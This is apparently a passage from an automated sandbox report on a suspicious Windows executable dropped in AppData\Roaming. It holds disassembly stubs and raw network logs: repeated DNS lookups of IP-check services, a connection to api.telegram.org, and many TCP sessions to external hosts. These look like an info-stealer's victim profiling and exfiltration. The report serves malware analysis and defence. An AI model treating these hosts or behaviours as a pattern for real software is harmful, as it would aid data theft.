                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C137D2h8_2_00C134D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C11FEAh8_2_00C11CF0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C1297Bh8_2_00C12680
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C11192h8_2_00C10E98
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C1033Ah8_2_00C10040
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C14162h8_2_00C13E68
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C1330Ah8_2_00C13010
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C11B22h8_2_00C11828
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C10CCAh8_2_00C109D0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C13C9Ah8_2_00C139A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C124B2h8_2_00C121B8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C12E42h8_2_00C12B48
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C10802h8_2_00C10508
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3B169h8_2_00C3AEC0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C33771h8_2_00C334C8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3CB7Bh8_2_00C3C8D0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C35181h8_2_00C34ED8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3E7B1h8_2_00C3E4E0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C36B91h8_2_00C368E8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C385A1h8_2_00C382F8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C34D29h8_2_00C34A80
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3E1C5h8_2_00C3DE88
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C36739h8_2_00C36490
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C38149h8_2_00C37EA0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3F579h8_2_00C3F2A8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C39B59h8_2_00C398B0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C37CF1h8_2_00C37A48
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C39701h8_2_00C39458
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3AD11h8_2_00C3AA68
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C33319h8_2_00C33070
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3C721h8_2_00C3C478
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C392A9h8_2_00C39000
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3F0E1h8_2_00C3EE10
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3C2C9h8_2_00C3C020
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C348D1h8_2_00C34628
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3DCD9h8_2_00C3DA30
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C362E1h8_2_00C36038
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3BE71h8_2_00C3BBC8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C34479h8_2_00C341D0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3D881h8_2_00C3D5D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C35E89h8_2_00C35BE0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C37899h8_2_00C375F0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3D429h8_2_00C3D180
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C35A31h8_2_00C35788
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C37441h8_2_00C37198
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C38E51h8_2_00C38BA8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C36FE9h8_2_00C36D40
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3FA11h8_2_00C3F740
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C389F9h8_2_00C38750
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3BA19h8_2_00C3B770
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3EC49h8_2_00C3E978
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C34021h8_2_00C33D78
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3B5C1h8_2_00C3B318
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C33BC9h8_2_00C33920
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C3CFD1h8_2_00C3CD28
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C355D9h8_2_00C35330
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00D62AFC
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00D62B00
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00D65F31
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00D65F38
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 193.122.6.168:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 132.226.247.73:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 193.122.6.168:80
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
